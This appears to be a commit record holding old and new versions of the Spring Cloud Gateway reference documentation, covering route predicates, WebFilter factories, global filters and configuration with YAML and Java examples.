add_request_header_route\n uri: http:\/\/example.org\n filters:\n - AddRequestHeader=X-Request-Foo, Bar\n----\n\nThis will add the `X-Request-Foo:Bar` header to the downstream request's headers for all matching requests.\n\n=== AddRequestParameter WebFilter Factory\nThe AddRequestParameter WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_parameter_route\n uri: http:\/\/example.org\n filters:\n - AddRequestParameter=foo, bar\n----\n\nThis will add `foo=bar` to the downstream request's query string for all matching requests.\n\n=== AddResponseHeader WebFilter Factory\nThe AddResponseHeader WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_response_header_route\n uri: http:\/\/example.org\n filters:\n - AddResponseHeader=X-Response-Foo, Bar\n----\n\nThis will add the `X-Response-Foo:Bar` header to the downstream response's headers for all matching requests.\n\n=== Hystrix WebFilter Factory\nThe Hystrix WebFilter Factory takes a single `name` parameter, which is the name of the `HystrixCommand`. 
(More options might be added in future releases.)\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: hystrix_route\n uri: http:\/\/example.org\n filters:\n - Hystrix=myCommandName\n----\n\nThis wraps the remaining filters in a `HystrixCommand` with the command name `myCommandName`.\n\n=== PrefixPath WebFilter Factory\nThe PrefixPath WebFilter Factory takes a single `prefix` parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: prefixpath_route\n uri: http:\/\/example.org\n filters:\n - PrefixPath=\/mypath\n----\n\nThis will prefix `\/mypath` to the path of all matching requests. So a request to `\/hello` would be sent to `\/mypath\/hello`.\n\n=== RequestRateLimiter WebFilter Factory\n\nThe RequestRateLimiter WebFilter Factory takes three parameters: `replenishRate`, `burstCapacity` and `keyResolverName`.\n\n`replenishRate` is the number of requests per second a user is allowed to make.\n\n`burstCapacity` TODO: document burst capacity\n\n`keyResolverName` is the name of a bean that implements the `KeyResolver` interface.\n\n.KeyResolver.java\n[source,java]\n----\npublic interface KeyResolver {\n\tMono<String> resolve(ServerWebExchange exchange);\n}\n----\n\nThe `KeyResolver` interface allows pluggable strategies to derive the key for limiting requests. In future milestones, there will be some `KeyResolver` implementations.\n\nThe Redis implementation is based on work done at https:\/\/stripe.com\/blog\/rate-limiters[Stripe]. It requires the use of the `spring-boot-starter-data-redis-reactive` Spring Boot starter.\n\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: requestratelimiter_route\n uri: http:\/\/example.org\n filters:\n - RequestRateLimiter=10, 20, userKeyResolver\n----\n\n.Config.java\n[source,java]\n----\n@Bean\nKeyResolver userKeyResolver() {\n return exchange -> Mono.just(exchange.getRequest().getQueryParams().getFirst(\"user\"));\n}\n----\n\nThis defines a request rate limit of 10 per second per user. The `KeyResolver` is a simple one that gets the `user` request parameter (note: this is not recommended for production).\n\n=== RedirectTo WebFilter Factory\nThe RedirectTo WebFilter Factory takes a `status` and a `url` parameter. The status should be a 300-series redirect HTTP code, such as 301. The url should be a valid URL. This will be the value of the `Location` header.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: redirectto_route\n uri: http:\/\/example.org\n filters:\n - RedirectTo=302, http:\/\/acme.org\n----\n\nThis will send a status 302 with a `Location:http:\/\/acme.org` header to perform a redirect.\n\n=== RemoveNonProxyHeaders WebFilter Factory\nThe RemoveNonProxyHeaders WebFilter Factory removes headers from forwarded requests. 
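Since the factory takes no arguments, it can presumably be applied by listing just its name in a route's filter list; the following is a minimal, illustrative sketch (the route id and URI are placeholders, not part of the official examples):\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removenonproxyheaders_route\n uri: http:\/\/example.org\n filters:\n - RemoveNonProxyHeaders\n----\n\n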
The default list of headers that is removed comes from the https:\/\/tools.ietf.org\/html\/draft-ietf-httpbis-p1-messaging-14#section-7.1.3[IETF].\n\n.The default removed headers are:\n * Connection\n * Keep-Alive\n * Proxy-Authenticate\n * Proxy-Authorization\n * TE\n * Trailer\n * Transfer-Encoding\n * Upgrade\n\nTo change this, set the `spring.cloud.gateway.filter.remove-non-proxy-headers.headers` property to the list of header names to remove.\n\n=== RemoveRequestHeader WebFilter Factory\nThe RemoveRequestHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removerequestheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveRequestHeader=X-Request-Foo\n----\n\nThis will remove the `X-Request-Foo` header before the request is sent downstream.\n\n=== RemoveResponseHeader WebFilter Factory\nThe RemoveResponseHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removeresponseheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveResponseHeader=X-Response-Foo\n----\n\nThis will remove the `X-Response-Foo` header from the response before it is returned to the gateway client.\n\n=== RewritePath WebFilter Factory\nThe RewritePath WebFilter Factory takes a path `regexp` parameter and a `replacement` parameter. This uses Java regular expressions for a flexible way to rewrite the request path.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: rewritepath_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/**\n filters:\n - RewritePath=\/foo\/(?<segment>.*), \/$\\{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request. Notice the `$\\`, which is replaced with `$` because of the YAML spec.\n\n=== SecureHeaders WebFilter Factory\nThe SecureHeaders WebFilter Factory adds a number of headers to the response, following the recommendations of https:\/\/blog.appcanary.com\/2017\/http-security-headers.html[this blog post].\n\n.The following headers are added (along with their default values):\n * `X-Xss-Protection:1; mode=block`\n * `Strict-Transport-Security:max-age=631138519`\n * `X-Frame-Options:DENY`\n * `X-Content-Type-Options:nosniff`\n * `Referrer-Policy:no-referrer`\n * `Content-Security-Policy:default-src 'self' https:; font-src 'self' https: data:; img-src 'self' https: data:; object-src 'none'; script-src https:; style-src 'self' https: 'unsafe-inline'`\n * `X-Download-Options:noopen`\n * `X-Permitted-Cross-Domain-Policies:none`\n\nTo change the default values, set the appropriate property in the `spring.cloud.gateway.filter.secure-headers` namespace:\n\n.Properties to change:\n * `xss-protection-header`\n * `strict-transport-security`\n * `frame-options`\n * `content-type-options`\n * `referrer-policy`\n * `content-security-policy`\n * `download-options`\n * `permitted-cross-domain-policies`\n\n\n=== SetPath WebFilter Factory\nThe SetPath WebFilter Factory takes a path `template` parameter. It offers a simple way to manipulate the request path by allowing templated segments of the path. This uses the URI templates from Spring Framework. 
Multiple matching segments are allowed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setpath_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n filters:\n - SetPath=\/{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request.\n\n=== SetResponseHeader WebFilter Factory\nThe SetResponseHeader WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setresponseheader_route\n uri: http:\/\/example.org\n filters:\n - SetResponseHeader=X-Response-Foo, Bar\n----\n\nThis WebFilter replaces all headers with the given name, rather than adding to them. So if the downstream server responded with an `X-Response-Foo:1234`, this would be replaced with `X-Response-Foo:Bar`, which is what the gateway client would receive.\n\n=== SetStatus WebFilter Factory\nThe SetStatus WebFilter Factory takes a single `status` parameter. It must be a valid Spring `HttpStatus`. It may be the integer value `404` or the string representation of the enumeration `NOT_FOUND`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatusstring_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=BAD_REQUEST\n - id: setstatusint_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nIn either case, the HTTP status of the response will be set to 401.\n\n== Global Filters\n\nThe `GlobalFilter` interface has the same signature as `WebFilter`. These are special filters that are conditionally applied to all routes. (This interface and usage are subject to change in future milestones.)\n\n=== LoadBalancerClient Filter\n\nThe `LoadBalancerClientFilter` looks for a URI in the exchange attribute `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR`. If the URL has a `lb` scheme (i.e. `lb:\/\/myservice`), it will use the Spring Cloud `LoadBalancerClient` to resolve the name (`myservice` in the previous example) to an actual host and port and replace the URI in the same attribute. The unmodified original URL is placed in the `ServerWebExchangeUtils.GATEWAY_ORIGINAL_REQUEST_URL_ATTR` attribute.\n\n=== Netty Routing Filter\n\nThe Netty Routing Filter runs if the URL located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has a `http` or `https` scheme. It uses the Netty `HttpClient` to make the downstream proxy request. The response is put in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute for use in a later filter. (There is an experimental `WebClientHttpRoutingFilter` that performs the same function, but does not require Netty.)\n\n=== Netty Write Response Filter\n\nThe `NettyWriteResponseFilter` runs if there is a Netty `HttpClientResponse` in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute. It is run after all other filters have completed and writes the proxy response back to the gateway client response. (There is an experimental `WebClientWriteResponseFilter` that performs the same function, but does not require Netty.)\n\n=== RouteToRequestUrl Filter\n\nThe `RouteToRequestUrlFilter` runs if there is a `Route` object in the `ServerWebExchangeUtils.GATEWAY_ROUTE_ATTR` exchange attribute. 
It creates a new URI, based on the request URI but updated with the URI attribute of the `Route` object. The new URI is placed in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute.\n\n=== Websocket Routing Filter\n\nThe Websocket Routing Filter runs if the URL located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has a `ws` or `wss` scheme. It uses the Spring Web Socket infrastructure to forward the Websocket request downstream.\n\n== Configuration\n\nConfiguration for Spring Cloud Gateway is driven by a collection of `RouteDefinitionLocator`s.\n\n.RouteDefinitionLocator.java\n[source,java]\n----\npublic interface RouteDefinitionLocator {\n\tFlux<RouteDefinition> getRouteDefinitions();\n}\n----\n\nBy default, a `PropertiesRouteDefinitionLocator` loads properties using Spring Boot's `@ConfigurationProperties` mechanism.\n\nThe configuration examples above all use a shortcut notation that uses positional arguments rather than named ones. The two examples below are equivalent:\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatus_route\n uri: http:\/\/example.org\n filters:\n - name: SetStatus\n args:\n status: 401\n - id: setstatusshortcut_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nFor some usages of the gateway, properties will be adequate, but some production use cases will benefit from loading configuration from an external source, such as a database. Future milestone versions will have `RouteDefinitionLocator` implementations based on Spring Data Repositories, such as Redis, MongoDB, and Cassandra.\n\n=== Fluent Java Routes API\nTo allow for simple configuration in Java, there is a fluent API defined in the `Routes` class.\n\n.Config.java\n[source,java]\n----\n\/\/ static imports from WebFilterFactories and RoutePredicates\n@Bean\npublic RouteLocator customRouteLocator(ThrottleWebFilterFactory throttle) {\n return Routes.locator()\n .route(\"test\")\n .uri(\"http:\/\/httpbin.org:80\")\n .predicate(host(\"**.abc.org\").and(path(\"\/image\/png\")))\n .addResponseHeader(\"X-TestHeader\", \"foobar\")\n .and()\n .route(\"test2\")\n .uri(\"http:\/\/httpbin.org:80\")\n .predicate(path(\"\/image\/webp\"))\n .add(addResponseHeader(\"X-AnotherHeader\", \"baz\"))\n .and()\n .build();\n}\n----\n\nThis style also allows for more custom predicate assertions. The predicates defined by `RouteDefinitionLocator` beans are combined using logical `and`. By using the fluent Java API, you can use the `and()`, `or()` and `negate()` operators on the `Predicate` class.\n\n== Actuator API\n\nTODO: document the `\/gateway` actuator endpoint\n\n== Developer Guide\n\nTODO: overview of writing custom integrations\n\n=== Writing Custom Route Predicate Factories\n\nTODO: document writing Custom Route Predicate Factories\n\n=== Writing Custom WebFilter Factories\n\nTODO: document writing Custom WebFilter Factories\n\n=== Writing Custom Global Filters\n\nTODO: document writing Custom Global Filters\n\n=== Writing Custom Route Locators and Writers\n\nTODO: document writing Custom Route Locators and Writers\n\n== Building a Simple Gateway Using Spring MVC\n\nSpring Cloud Gateway provides a utility object called `ProxyExchange` which you can use inside a regular Spring MVC handler as a method parameter. 
It supports basic downstream HTTP exchanges via methods that mirror the HTTP verbs, or forwarding to a local handler via the `forward()` method.\n\nExample (proxying a request to \"\/test\" downstream to a remote server):\n\n```java\n@RestController\n@SpringBootApplication\npublic class GatewaySampleApplication {\n\n\t@Value(\"${remote.home}\")\n\tprivate URI home;\n\n\t@GetMapping(\"\/test\")\n\tpublic ResponseEntity<?> proxy(ProxyExchange<Object> proxy) throws Exception {\n\t\treturn proxy.uri(home.toString() + \"\/image\/png\").get();\n\t}\n\n}\n```\n\nThere are convenience methods on the `ProxyExchange` to enable the handler method to discover and enhance the URI path of the incoming request. For example you might want to extract the trailing elements of a path to pass them downstream:\n\n```java\n@GetMapping(\"\/proxy\/path\/**\")\npublic ResponseEntity<?> proxyPath(ProxyExchange<?> proxy) throws Exception {\n String path = proxy.path(\"\/proxy\/path\/\");\n return proxy.uri(home.toString() + \"\/foos\/\" + path).get();\n}\n```\n\nAll the features of Spring MVC are available to Gateway handler methods. So you can inject request headers and query parameters, for instance, and you can constrain the incoming requests with declarations in the mapping annotation. See the documentation for `@RequestMapping` in Spring MVC for more details of those features.\n\nHeaders can be added to the downstream response using the `header()` methods on `ProxyExchange`.\n\nYou can also manipulate response headers (and anything else you like in the response) by adding a mapper to the `get()` etc. method. The mapper is a `Function` that takes the incoming `ResponseEntity` and converts it to an outgoing one.\n\nFirst class support is provided for \"sensitive\" headers (\"cookie\" and \"authorization\" by default) which are not passed downstream, and for \"proxy\" headers (`x-forwarded-*`).\n","old_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-gateway\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n:nofooter:\n:imagesdir: .\/images\n:imagesurl: {github-raw}\/docs\/src\/main\/asciidoc\/images\n= Spring Cloud Gateway\n\n*{spring-cloud-version}*\n\ninclude::intro.adoc[]\n\n[[gateway-starter]]\n== How to Include Spring Cloud Gateway\n\nTo include Spring Cloud Gateway in your project use the starter with group `org.springframework.cloud`\nand artifact id `spring-cloud-starter-gateway`. See the http:\/\/projects.spring.io\/spring-cloud\/[Spring Cloud Project page]\nfor details on setting up your build system with the current Spring Cloud Release Train.\n\nIf you include the starter, but, for some reason, you do not want the gateway to be enabled, set `spring.cloud.gateway.enabled=false`.\n\n== Glossary\n\n* *Route*: Route the basic building block of the gateway. It is defined by an ID, a destination URI, a collection of predicates and a collection of filters. A route is matched if aggregate predicate is true.\n* *Predicate*: This is a http:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/function\/Predicate.html[Java 8 Function Predicate]. The input type is a http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/ServerWebExchange.html[Spring Framework `ServerWebExchange`]. 
This allows developers to match on anything from the HTTP request, such as headers or parameters.\n* *Filter*: These are instances of http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/WebFilter.html[Spring Framework `WebFilter`] constructed with a specific factory. Here, requests and responses can be modified before or after sending the downstream request.\n\n[[gateway-how-it-works]]\n== How It Works\n\nimage::{imagesurl}\/spring_cloud_gateway_diagram.png[Spring Cloud Gateway Diagram]\n\nClients make requests to Spring Cloud Gateway. If the Gateway Handler Mapping determines that a request matches a Route, it is sent to the Gateway Web Handler. This handler sends the request through a filter chain that is specific to the request. The reason the filters are divided by the dotted line is that filters may execute logic before the proxy request is sent or after. All \"pre\" filter logic is executed, then the proxy request is made. After the proxy request is made, the \"post\" filter logic is executed.\n\n[[gateway-request-predicates-factories]]\n== Route Predicate Factories\n\nSpring Cloud Gateway matches routes as part of the Spring WebFlux `HandlerMapping` infrastructure. Spring Cloud Gateway includes many built-in Route Predicate Factories. All of these predicates match on different attributes of the HTTP request. Multiple Route Predicate Factories can be combined, and they are combined via logical `and`.\n\n=== After Route Predicate Factory\nThe After Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen after the specified datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: after_route\n uri: http:\/\/example.org\n predicates:\n - After=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request after Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Before Route Predicate Factory\nThe Before Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen before the specified datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: before_route\n uri: http:\/\/example.org\n predicates:\n - Before=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request before Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Between Route Predicate Factory\nThe Between Route Predicate Factory takes two parameters, datetime1 and datetime2. This predicate matches requests that happen after datetime1 and before datetime2. The datetime2 parameter must be after datetime1.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: between_route\n uri: http:\/\/example.org\n predicates:\n - Between=2017-01-20T17:42:47.789-07:00[America\/Denver], 2017-01-21T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request after Jan 20, 2017 17:42 Mountain Time (Denver) and before Jan 21, 2017 17:42 Mountain Time (Denver). This could be useful for maintenance windows.\n\n=== Cookie Route Predicate Factory\nThe Cookie Route Predicate Factory takes two parameters, the cookie name and a regular expression.
This predicate matches cookies that have the given name and whose value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: cookie_route\n uri: http:\/\/example.org\n predicates:\n - Cookie=chocolate, ch.p\n----\n\nThis route matches if the request has a cookie named `chocolate` whose value matches the `ch.p` regular expression.\n\n=== Header Route Predicate Factory\nThe Header Route Predicate Factory takes two parameters, the header name and a regular expression. This predicate matches if the request has a header with the given name whose value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: header_route\n uri: http:\/\/example.org\n predicates:\n - Header=X-Request-Id, \\d+\n----\n\nThis route matches if the request has a header named `X-Request-Id` whose value matches the `\\d+` regular expression (i.e. it has a value of one or more digits).\n\n=== Host Route Predicate Factory\nThe Host Route Predicate Factory takes one parameter: the host name pattern. The pattern is an Ant style pattern with `.` as the separator. This predicate matches if the `Host` header matches the pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: host_route\n uri: http:\/\/example.org\n predicates:\n - Host=**.somehost.org\n----\n\nThis route would match if the request has a `Host` header with the value `www.somehost.org` or `beta.somehost.org`.\n\n\n=== Method Route Predicate Factory\nThe Method Route Predicate Factory takes one parameter: the HTTP method to match.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: method_route\n uri: http:\/\/example.org\n predicates:\n - Method=GET\n----\n\nThis route would match if the request method was `GET`.\n\n=== Path Route Predicate Factory\nThe Path Route Predicate Factory takes one parameter: a Spring `PathMatcher` pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: path_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n----\n\nThis route would match if the request path was, for example, `\/foo\/1` or `\/foo\/bar`.\n\nThis predicate extracts the URI template variables (like `segment` defined in the example above) as a map of names and values and places it in the `ServerWebExchange.getAttributes()` with a key defined in `PathRoutePredicate.URL_PREDICATE_VARS_ATTR`.
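For illustration, a custom filter could read those variables back out of the exchange. The following is a minimal sketch, not part of the original text: the method shown is the body of a Spring `WebFilter`, and the cast plus the `segment` key assume the `Path=\/foo\/{segment}` example above.\n\n[source,java]\n----\n\/\/ Sketch of a WebFilter reading the URI template variables stored by the\n\/\/ Path Route Predicate (assumes the Path=\/foo\/{segment} route above).\n@SuppressWarnings(\"unchecked\")\npublic Mono<Void> filter(ServerWebExchange exchange, WebFilterChain chain) {\n Map<String, String> uriVariables = (Map<String, String>) exchange\n .getAttributes().get(PathRoutePredicate.URL_PREDICATE_VARS_ATTR);\n String segment = uriVariables.get(\"segment\"); \/\/ e.g. \"bar\" for \/foo\/bar\n return chain.filter(exchange);\n}\n----\n\n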
Those values are then available for use by <<gateway-route-filters,WebFilter Factories>>.\n\n=== Query Route Predicate Factory\nThe Query Route Predicate Factory takes two parameters: a required `param` and an optional `regexp`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=baz\n----\n\nThis route would match if the request contained a `baz` query parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=foo, ba.\n----\n\nThis route would match if the request contained a `foo` query parameter whose value matched the `ba.` regexp, so `bar` and `baz` would match.\n\n\n=== RemoteAddr Route Predicate Factory\nThe RemoteAddr Route Predicate Factory takes a list (min size 1) of CIDR-notation strings, e.g. `192.168.0.1\/16` (where `192.168.0.1` is an IP address and `16` is a subnet mask).\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: remoteaddr_route\n uri: http:\/\/example.org\n predicates:\n - RemoteAddr=192.168.1.1\/24\n----\n\nThis route would match if the remote address of the request was, for example, `192.168.1.10`.\n\n[[gateway-route-filters]]\n== WebFilter Factories\n\nRoute filters allow the modification of the incoming HTTP request or outgoing HTTP response in some manner. Route filters are scoped to a particular route. Spring Cloud Gateway includes many built-in WebFilter Factories.\n\n=== AddRequestHeader WebFilter Factory\nThe AddRequestHeader WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_header_route\n uri: http:\/\/example.org\n filters:\n - AddRequestHeader=X-Request-Foo, Bar\n----\n\nThis will add the `X-Request-Foo:Bar` header to the downstream request's headers for all matching requests.\n\n=== AddRequestParameter WebFilter Factory\nThe AddRequestParameter WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_parameter_route\n uri: http:\/\/example.org\n filters:\n - AddRequestParameter=foo, bar\n----\n\nThis will add `foo=bar` to the downstream request's query string for all matching requests.\n\n=== AddResponseHeader WebFilter Factory\nThe AddResponseHeader WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_response_header_route\n uri: http:\/\/example.org\n filters:\n - AddResponseHeader=X-Response-Foo, Bar\n----\n\nThis will add the `X-Response-Foo:Bar` header to the downstream response's headers for all matching requests.\n\n=== Hystrix WebFilter Factory\nThe Hystrix WebFilter Factory takes a single `name` parameter, which is the name of the `HystrixCommand`.
(More options might be added in future releases.)\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: hystrix_route\n uri: http:\/\/example.org\n filters:\n - Hystrix=myCommandName\n----\n\nThis wraps the remaining filters in a `HystrixCommand` with command name `myCommandName`.\n\n=== PrefixPath WebFilter Factory\nThe PrefixPath WebFilter Factory takes a single `prefix` parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: prefixpath_route\n uri: http:\/\/example.org\n filters:\n - PrefixPath=\/mypath\n----\n\nThis will prefix `\/mypath` to the path of all matching requests. So a request to `\/hello` would be sent to `\/mypath\/hello`.\n\n=== RequestRateLimiter WebFilter Factory\n\nThe RequestRateLimiter WebFilter Factory takes three parameters: `replenishRate`, `burstCapacity` and `keyResolverName`.\n\n`replenishRate` is how many requests per second a user is allowed to make.\n\n`burstCapacity` TODO: document burst capacity\n\n`keyResolverName` is the name of a bean that implements the `KeyResolver` interface.\n\n.KeyResolver.java\n[source,java]\n----\npublic interface KeyResolver {\n\tMono<String> resolve(ServerWebExchange exchange);\n}\n----\n\nThe `KeyResolver` interface allows pluggable strategies to derive the key for limiting requests. In future milestones, there will be some `KeyResolver` implementations.\n\nThe Redis implementation is based on work done at https:\/\/stripe.com\/blog\/rate-limiters[Stripe]. It requires the use of the `spring-boot-starter-data-redis-reactive` Spring Boot starter.\n\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: requestratelimiter_route\n uri: http:\/\/example.org\n filters:\n - RequestRateLimiter=10, 20, userKeyResolver\n----\n\n.Config.java\n[source,java]\n----\n@Bean\nKeyResolver userKeyResolver() {\n return exchange -> Mono.just(exchange.getRequest().getQueryParams().getFirst(\"user\"));\n}\n----\n\nThis defines a request rate limit of 10 per second per user. The `KeyResolver` is a simple one that gets the `user` request parameter (note: this is not recommended for production).\n\n=== RedirectTo WebFilter Factory\nThe RedirectTo WebFilter Factory takes a `status` and a `url` parameter. The status should be a 300-series redirect HTTP code, such as 301. The url should be a valid URL. This will be the value of the `Location` header.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: redirectto_route\n uri: http:\/\/example.org\n filters:\n - RedirectTo=302, http:\/\/acme.org\n----\n\nThis will send a status 302 with a `Location:http:\/\/acme.org` header to perform a redirect.\n\n=== RemoveNonProxyHeaders WebFilter Factory\nThe RemoveNonProxyHeaders WebFilter Factory removes headers from forwarded requests.
The default list of headers that is removed comes from the https:\/\/tools.ietf.org\/html\/draft-ietf-httpbis-p1-messaging-14#section-7.1.3[IETF].\n\n.The default removed headers are:\n * Connection\n * Keep-Alive\n * Proxy-Authenticate\n * Proxy-Authorization\n * TE\n * Trailer\n * Transfer-Encoding\n * Upgrade\n\nTo change this, set the `spring.cloud.gateway.filter.remove-non-proxy-headers.headers` property to the list of header names to remove.\n\n=== RemoveRequestHeader WebFilter Factory\nThe RemoveRequestHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removerequestheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveRequestHeader=X-Request-Foo\n----\n\nThis will remove the `X-Request-Foo` header before it is sent downstream.\n\n=== RemoveResponseHeader WebFilter Factory\nThe RemoveResponseHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removeresponseheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveResponseHeader=X-Response-Foo\n----\n\nThis will remove the `X-Response-Foo` header from the response before it is returned to the gateway client.\n\n=== RewritePath WebFilter Factory\nThe RewritePath WebFilter Factory takes a path `regexp` parameter and a `replacement` parameter. This uses Java regular expressions for a flexible way to rewrite the request path.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: rewritepath_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/**\n filters:\n - RewritePath=\/foo\/(?<segment>.*), \/$\\{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request. Notice the `$\\`, which is replaced with `$` because of the YAML spec.\n\n=== SecureHeaders WebFilter Factory\nThe SecureHeaders WebFilter Factory adds a number of headers to the response, per the recommendations made in https:\/\/blog.appcanary.com\/2017\/http-security-headers.html[this blog post].\n\n.The following headers are added (along with their default values):\n * `X-Xss-Protection:1; mode=block`\n * `Strict-Transport-Security:max-age=631138519`\n * `X-Frame-Options:DENY`\n * `X-Content-Type-Options:nosniff`\n * `Referrer-Policy:no-referrer`\n * `Content-Security-Policy:default-src 'self' https:; font-src 'self' https: data:; img-src 'self' https: data:; object-src 'none'; script-src https:; style-src 'self' https: 'unsafe-inline'`\n * `X-Download-Options:noopen`\n * `X-Permitted-Cross-Domain-Policies:none`\n\nTo change the default values, set the appropriate property in the `spring.cloud.gateway.filter.secure-headers` namespace:\n\n.Properties to change:\n * `xss-protection-header`\n * `strict-transport-security`\n * `frame-options`\n * `content-type-options`\n * `referrer-policy`\n * `content-security-policy`\n * `download-options`\n * `permitted-cross-domain-policies`\n\n\n=== SetPath WebFilter Factory\nThe SetPath WebFilter Factory takes a path `template` parameter. It offers a simple way to manipulate the request path by allowing templated segments of the path. This uses the URI templates from Spring Framework.
